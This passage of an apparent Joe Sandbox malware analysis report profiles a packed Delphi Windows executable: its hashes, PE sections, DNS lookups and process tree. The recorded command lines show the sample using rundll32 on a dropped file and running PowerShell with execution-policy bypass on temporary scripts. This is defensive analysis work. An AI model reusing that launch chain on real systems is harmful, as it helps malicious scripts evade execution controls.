Copyright Joe Security LLC 2021 Page 13 of 19 C:\Users\user\Documents\20210725\PowerShell_transcript.116938.swg8lo9M.20210725082922.txt Preview: .**********************..Windows PowerShell transcript start..Start time: 20210725082943..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 116938 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Executionpolicy bypass -File C:\Users\user\AppData\Local\Temp\tmpD845.tmp.ps1..Process ID: 6764..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..* *********************..**********************..Command start time: 20210725082948..**********************..PS>CommandInvocation(tmpD845.tmp.ps1): "tmpD845.tmp.p s1"..**********************..Command start time: 20210725083325..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End

Static File Info

General File type: PE32 executable (GUI) Intel 80386, for MS Windows Entropy (8bit): 7.8587976700533515 TrID: Win32 Executable (generic) a (10002005/4) 99.94% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00% File name: X4xY5J1GWc.exe File size: 1149952 MD5: ab4cf6181cfb102ec86c66d56af2d229 SHA1: ac756cbff2887e804e9957898b0d6450a33a0aa1 SHA256: f7c566ca7413a1259a7bcc120bc431a5ad129438b1e8b9 b51c398d5eecfc51a5 SHA512: dec2910e395b1714966c85741f1062f6a4b62a9a1ab3f8f 92c573a2b44a49ced2a963f383247b871eb90ec7cc795a 4226dc0944b8bce3e74bb3f5bd2024b0a2f SSDEEP: 24576:RtrUusPn8AAsDdRY+KBXRLR6YD1kl6YfaWAy 0BPA:RtvsP9JRY+KBB96YKIsFn0BI File Content Preview: MZ...... @...... !..L.!Th is program cannot be run in DOS mode....$...... PE..L...~ ..^...... @....I....

File Icon

Icon Hash: e0e0e8beb0e4c8ea

Static PE Info

General Entrypoint: 0x4ec9e7 Entrypoint Section: .text Digitally signed: false Imagebase: 0x400000 Subsystem: windows gui Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED DLL Characteristics: TERMINAL_SERVER_AWARE, NX_COMPAT Time Stamp: 0x5EAB2E7E [Thu Apr 30 20:01:02 2020 UTC] TLS Callbacks: CLR (.Net) Version: OS Version Major: 5 OS Version Minor: 0 File Version Major: 5 File Version Minor: 0 Subsystem Version Major: 5 Subsystem Version Minor: 0 Import Hash: 7674305f35b9aa8841472231e8903dc3

Entrypoint Preview

Data Directories

Copyright Joe Security LLC 2021 Page 14 of 19 Sections

Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics .text 0x1000 0xf3eb2 0xf4000 False 0.980420722336 data 7.9914516517 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ .data 0xf5000 0x46b260 0x3c00 unknown unknown unknown unknown IMAGE_SCN_CNT_INITIALIZED_DA TA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ .tls 0x561000 0xff5 0x1000 False 0.00634765625 data 0.0 IMAGE_SCN_CNT_INITIALIZED_DA TA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ .rsrc 0x562000 0x1fb78 0x1fc00 False 0.644100639764 data 6.46977992651 IMAGE_SCN_CNT_INITIALIZED_DA TA, IMAGE_SCN_MEM_READ

Resources

Imports

Version Infos

Possible Origin

Language of compilation system Country where language is spoken Map

Croatian Croatia

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class Jul 25, 2021 08:30:25.298599005 CEST 192.168.2.6 8.8.8.8 0x1 Standard query 8.8.8.8.in- PTR (Pointer IN (0x0001) (0) addr.arpa record) Jul 25, 2021 08:30:25.329036951 CEST 192.168.2.6 8.8.8.8 0x2 Standard query localhost 255 IN (0x0001) (0)

DNS Answers

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class Jul 25, 2021 8.8.8.8 192.168.2.6 0x1 No error (0) 8.8.8.8.in- PTR (Pointer IN (0x0001) 08:30:25.326927900 addr.arpa record) CEST Jul 25, 2021 8.8.8.8 192.168.2.6 0x2 Name error (3) localhost none none 255 IN (0x0001) 08:30:25.365447044 CEST

Code Manipulations

Statistics Copyright Joe Security LLC 2021 Page 15 of 19 Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: X4xY5J1GWc.exe PID: 6644 Parent PID: 5920

General

Start time: 08:28:19 Start date: 25/07/2021 Path: C:\Users\user\Desktop\X4xY5J1GWc.exe Wow64 process (32bit): true Commandline: 'C:\Users\user\Desktop\X4xY5J1GWc.exe' Imagebase: 0x400000 File size: 1149952 bytes MD5 hash: AB4CF6181CFB102EC86C66D56AF2D229 Has elevated privileges: true Has administrator privileges: true Programmed in: Borland Delphi Reputation: low

File Activities Show Windows behavior

File Created

File Written

Analysis Process: rundll32.exe PID: 6712 Parent PID: 6644

General

Start time: 08:28:22 Start date: 25/07/2021 Path: C:\Windows\SysWOW64\rundll32.exe Wow64 process (32bit): true Commandline: C:\Windows\system32\rundll32.exe C:\Users\user\Desktop\X4XY5J~1.TMP,S C:\Users\u ser\Desktop\X4XY5J~1.EXE Imagebase: 0x3a0000 File size: 61952 bytes MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D Has elevated privileges: true Has administrator privileges: true Programmed in: Borland Delphi Reputation: high

File Activities Show Windows behavior

Analysis Process: rundll32.exe PID: 7140 Parent PID: 6712

Copyright Joe Security LLC 2021 Page 16 of 19 General

Start time: 08:28:50 Start date: 25/07/2021 Path: C:\Windows\SysWOW64\rundll32.exe Wow64 process (32bit): true Commandline: C:\Windows\system32\RUNDLL32.EXE C:\Users\user\Desktop\X4XY5J~1.TMP,Z0sc Imagebase: 0x3a0000 File size: 61952 bytes MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D Has elevated privileges: true Has administrator privileges: true Programmed in: Borland Delphi Reputation: high

File Activities Show Windows behavior

File Created

File Written

File Read

Registry Activities Show Windows behavior

Key Value Created

Key Value Modified

Analysis Process: powershell.exe PID: 6764 Parent PID: 7140

General

Start time: 08:29:18 Start date: 25/07/2021 Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): true Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Executionpolicy bypass - File 'C:\Users\user\AppData\Local\Temp\tmpD845.tmp.ps1' Imagebase: 0xd30000 File size: 430592 bytes MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10 Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: high

File Activities Show Windows behavior

File Created

File Deleted

File Written

File Read

Analysis Process: conhost.exe PID: 6568 Parent PID: 6764 Copyright Joe Security LLC 2021 Page 17 of 19 General

Start time: 08:29:19 Start date: 25/07/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff61de10000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Analysis Process: powershell.exe PID: 5484 Parent PID: 7140

General

Start time: 08:30:11 Start date: 25/07/2021 Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): true Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Executionpolicy bypass - File 'C:\Users\user\AppData\Local\Temp\tmpA617.tmp.ps1' Imagebase: 0xd30000 File size: 430592 bytes MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10 Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: high

File Activities Show Windows behavior

File Created

File Read

Analysis Process: conhost.exe PID: 5548 Parent PID: 5484

General

Start time: 08:30:12 Start date: 25/07/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff61de10000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Disassembly

Copyright Joe Security LLC 2021 Page 18 of 19 Code Analysis

Copyright Joe Security LLC Joe Sandbox Cloud Basic 33.0.0 White Diamond

Copyright Joe Security LLC 2021 Page 19 of 19